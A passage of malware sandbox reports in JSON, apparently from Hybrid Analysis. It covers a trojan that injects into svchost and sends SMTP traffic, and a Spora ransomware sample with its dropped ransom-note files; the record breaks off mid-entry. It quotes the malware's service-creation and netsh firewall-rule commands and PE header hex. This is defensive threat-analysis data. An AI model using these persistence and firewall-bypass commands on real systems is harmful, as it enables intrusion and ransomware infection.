"\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"chrmgspr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"chrmgspr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"1c2078\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"981840\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004288)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"chrmgspr.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TPXHOIKO\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\chrmgspr.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\chrmgspr.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has section name .text with entropy \"6.630102803682182\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has section name .text with entropy \"7.972855291312212\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has section name .reloc with entropy \"6.221515464885055\"\n \"chrmgspr.exe\" has section name .text with entropy \"6.630102803682182\"\n \"chrmgspr.exe\" has section name .text with entropy \"7.972855291312212\"\n \"chrmgspr.exe\" has section name .reloc with entropy \"6.221496050028631\"\n \"DISMHOST.EXE.67EE524C.bin\" has section name .text with entropy \"6.114767813379059\"\n \"DISMHOST.EXE.67EE524C.bin\" has section name .data with entropy \"6.4458000319803865\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (UID: 00000000-00005760)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006032)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\chrmgspr.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006072)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\chrmgspr.exe /d\\\\\"C:\\\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00006016)\n Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00006128)\n Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005936)\n Spawned process \"chrmgspr.exe\" with commandline \"/d\"C:\\\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\"\" (UID: 00000000-00004084)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004288)\n Spawned process \"svchost.exe\" (UID: 00000000-00004144)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"chrmgspr.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"chrmgspr.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"chrmgspr.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"chrmgspr.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"chrmgspr.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004084)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"chrmgspr.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000a00001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005936)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004288)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189
https://hybrid-analysis.com/sample/6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189
Hybrid Analysis - Ransomware
{"size": 262913, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189", "sha256": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189", "av_detect": 93, "vx_family": "Trojan.Ransom.Spora.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1092, "total_processes": 5, "total_signatures": 261, "extracted_files": [{"name": "Outlook.srs", "file_path": "%APPDATA%\\Microsoft\\Outlook\\Outlook.srs", "file_size": 2980, "sha256": "8994a363046c84403439ca3e21079f7fbf5e64183efbc524e19c04b4f40548b0", "description": "Composite Document File V2 Document, Can't read directory", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_BRYBO0X_.png", "file_path": "%APPDATA%\\Microsoft\\Outlook\\_HELP_HELP_HELP_BRYBO0X_.png", "file_size": 634333, "sha256": "7d365f6412d8a2e2aaa9f28e167265c9c28f642e89a285f55d5dcfdaee271553", "type_tags": ["image", "png"], "description": "PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_RASBJ_.hta", "file_path": "%APPDATA%\\Microsoft\\Outlook\\_HELP_HELP_HELP_RASBJ_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat", "file_path": "%APPDATA%\\Microsoft\\Speech\\Files\\UserLexicons\\SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat", "file_size": 940, "sha256": "cbcb19a49403eef31ef6e3a9529c4d08d3dc637aed83d59d2e970860f655c895", "type_tags": ["data"], "description": "data", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_CJ4QR38_.png", "file_path": "%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_CJ4QR38_.png", "file_size": 634333, "sha256": "7d365f6412d8a2e2aaa9f28e167265c9c28f642e89a285f55d5dcfdaee271553", "type_tags": ["image", "png"], "description": "PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_K7FG_.hta", "file_path": "%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_K7FG_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "officec2rclient.exe_Rules.xml", "file_path": "%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml", "file_size": 27676, "sha256": "8a8e144c4ce0707e8cbae7cd4e33241b1953fdd7cd67c180d6dff7215d3e2100", "type_tags": ["data"], "description": "data", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "officeclicktorun.exe_Rules.xml", "file_path": "%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml", "file_size": 27678, "sha256": "44866dceba3bcb0765dcd37da2e0e7fc9d7bcf04d9897615159e18171a620c7b", "type_tags": ["data"], "description": "data", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "setup32.exe_Rules.xml", "file_path": "%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml", "file_size": 27660, "sha256": "ea13265ac03a30099c3791427856a4f1f13f29d233e97d300f9ce7ce7771b841", "type_tags": ["data"], "description": "data", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winword.exe_Rules.xml", "file_path": "%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml", "file_size": 230209, "sha256": "32c6e5d31773e6d8b5cbfd133963d427fbc8b9967e4dad0892b7161550196dff", "type_tags": ["data"], "description": "data", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4f98.tmp", "file_path": "%TEMP%\\733c94c5\\4f98.tmp", "file_size": 344, "sha256": "27638570769945a96a174f207d0a2059092b05a69afd7160775f1ddc904f46c6", "type_tags": ["text"], "description": "ASCII text, with very long lines (344), with no line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "cebb.tmp", "file_path": "%TEMP%\\733c94c5\\cebb.tmp", "file_size": 130, "sha256": "c58c75e3a16a78ef997f98076675dc70c939cefbe037027a3461028f1c48ec79", "type_tags": ["text"], "description": "b.out overlay pure segmented standalone object file V2.3 V3.0 Large Text", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tmpBDC4.bmp", "file_path": "%TEMP%\\tmpBDC4.bmp", "file_size": 54, "sha256": "226e534da89e7b2068b234429a74510acac4f57591f3b1fe129fdcc2d3a86cab", "type_tags": ["image", "bmp"], "description": "PC bitmap, Windows 3.x format, 1280 x 1024 x 32, image size 5242880, cbSize 5242934, bits offset 54", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_EFSR87_.png", "file_path": "%USERPROFILE%\\Desktop\\_HELP_HELP_HELP_EFSR87_.png", "file_size": 634333, "sha256": "7d365f6412d8a2e2aaa9f28e167265c9c28f642e89a285f55d5dcfdaee271553", "type_tags": ["image", "png"], "description": "PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_QNTKK6_.hta", "file_path": "%USERPROFILE%\\Desktop\\_HELP_HELP_HELP_QNTKK6_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt", "file_path": "%USERPROFILE%\\Documents\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt", "file_size": 10333, "sha256": "2d92f951dcc32a8f6421f3e390cebc9ccd54ef6bcc04009c0618ea0ca83aa276", "type_tags": ["data"], "description": "data", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_2TUQAJ6_.hta", "file_path": "%USERPROFILE%\\Documents\\Amazon Downloader Logs\\_HELP_HELP_HELP_2TUQAJ6_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_SJITSQ0_.png", "file_path": "%USERPROFILE%\\Documents\\Amazon Downloader Logs\\_HELP_HELP_HELP_SJITSQ0_.png", "file_size": 634333, "sha256": "7d365f6412d8a2e2aaa9f28e167265c9c28f642e89a285f55d5dcfdaee271553", "type_tags": ["image", "png"], "description": "PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Database1.accdb", "file_path": "%USERPROFILE%\\Documents\\Database1.accdb", "file_size": 348588, "sha256": "effd57f73e91d51da48b734f83c9dbe5e2a06b3e5a8aeec52a346e94a7f3c490", "type_tags": ["data"], "description": "Microsoft Access Database", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Outlook.pst", "file_path": "%USERPROFILE%\\Documents\\Outlook Files\\Outlook.pst", "file_size": 271780, "sha256": "94c4dabb6dc59262ba2bcd597348406a658b33b927723e2a85dfc6a831a5dc4f", "type_tags": ["unknown"], "description": "Microsoft Outlook email folder (>=2003)", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_81QUAPV_.hta", "file_path": "%USERPROFILE%\\Documents\\Outlook Files\\_HELP_HELP_HELP_81QUAPV_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": 